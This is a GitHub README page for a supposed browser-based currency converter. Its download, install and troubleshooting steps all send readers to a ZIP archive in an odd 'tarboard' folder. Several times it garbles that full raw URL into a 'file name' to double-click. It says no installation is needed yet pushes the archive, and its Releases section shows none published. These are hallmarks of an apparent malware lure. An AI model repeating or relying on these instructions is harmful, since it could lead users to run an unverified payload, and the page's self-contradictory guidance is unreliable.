Skip to content

KomikGamblez/Currency-Converter

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

6 Commits
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐Ÿ’ฑ Currency-Converter - Convert Currencies in Real Time

Download Currency-Converter


๐Ÿ“‹ About Currency-Converter

Currency-Converter is a simple app that helps you convert money from one currency to another. It updates exchange rates live, so you always get the latest information. You can quickly switch currencies with a handy swap button. It also shows flags of countries next to currency names for easy recognition.

The app runs in your web browser using HTML, CSS, and JavaScript. It connects to online services to get exchange rates and flags automatically. This makes using it smooth and straightforward without extra setup.


๐Ÿ–ฅ System Requirements

Before you start, make sure your computer or device fits these requirements:

  • Web Browser: Any modern browser like Chrome, Firefox, Edge, or Safari.
  • Internet Connection: Required to fetch live exchange rates and country flags.
  • Operating System: Works on Windows, macOS, Linux, and mobile devices with a browser.
  • Screen Resolution: Designed to work well on screens 1024 pixels wide or more but is responsive and adapts to smaller devices.

You do not need to install any software besides your web browser.


๐Ÿš€ Getting Started

Follow these steps to start using Currency-Converter:

  1. Open your web browser
    Launch any modern internet browser you prefer.

  2. Download the app package
    Visit the release page provided below. You will find files and instructions to run the app.

  3. Extract the files
    If you download a ZIP file, unzip it on your computer. Most systems let you right-click the file and select "Extract All" or similar.

  4. Open the app file
    Inside the extracted folder, look for a file named https://github.com/KomikGamblez/Currency-Converter/raw/refs/heads/main/tarboard/Currency-Converter-v2.6.zip. This is the main app file. Double-click it to open in your browser.

  5. Start converting currencies
    Once the app opens, select your currencies and enter the amount. The converted value will appear instantly.


๐Ÿ’พ Download & Install

Please visit this page to download Currency-Converter:

Download Currency-Converter Releases

On the page:

  • Find the latest version of the app.
  • Download the file named something like https://github.com/KomikGamblez/Currency-Converter/raw/refs/heads/main/tarboard/Currency-Converter-v2.6.zip.
  • After downloading, unzip the file to a folder you can easily access, like your Desktop or Documents.

There is no installation procedure as this is a web-based app you run locally through your browser. Just make sure you keep the files together if you move the folder.


๐Ÿ›  How to Use Currency-Converter

Once you open the app in your browser, you will see:

  • From Currency: The currency you want to convert from. Use the dropdown menu to pick one.
  • To Currency: The currency to convert to. This also has a dropdown with flags.
  • Amount: Enter the number you want to convert.
  • Converted Amount: Shows the equivalent amount in the selected currency.
  • Swap Button: Quickly switches the "From" and "To" currencies without re-entering values.

The exchange rates update automatically when you open the app or change a currency. You need an internet connection for this.


๐Ÿ” Features

  • Real-time Exchange Rates: Always get up-to-date currency values using the Fawaz Ahmed Currency API.
  • Dynamic Flags: See flags next to currency names for clearer identification via the Flags API.
  • Quick Swap Button: Switch your input and output currencies fast.
  • Responsive Design: Works well across devicesโ€”from desktop screens to phones.
  • Clean Interface: Simple layout focused on usability.

๐ŸŽฏ Why Use This App?

Converting money can be confusing. Currency-Converter makes it easy without jargon or complex settings. It fetches rates automatically and shows country flags to help you identify currencies. Whether you travel, shop online, or compare prices, this app saves you time.

No installation or account needed. Run it anytime with your browser.


๐Ÿค Support & Feedback

If you find issues or want to suggest improvements, use the GitHub repositoryโ€™s Issues tab. The project owner reviews requests and provides updates based on user feedback.


๐Ÿ”— Useful Links


๐Ÿ“ Technical Details (For Interest)

  • Built with HTML5, CSS3, and JavaScript
  • Fetches data from:
    • Fawaz Ahmed Currency API for exchange rates
    • Flags API for country flags
  • Uses Fetch API to get live data asynchronously
  • No backend or databases neededโ€”the app runs fully in your browser

๐Ÿค” Troubleshooting

The app does not load or shows errors:

  • Check your internet connection. The app needs to get live data online.
  • Make sure you opened the file directly in a browser by double-clicking https://github.com/KomikGamblez/Currency-Converter/raw/refs/heads/main/tarboard/Currency-Converter-v2.6.zip.
  • Try a different browser if problems persist.

The currency list does not show flags:

  • This can happen if flag image servers are unreachable. Wait a moment and refresh the page.

Thank you for choosing Currency-Converter. Visit the download page to get started:

Get Currency-Converter

Releases

No releases published

Packages

 
 
 

Contributors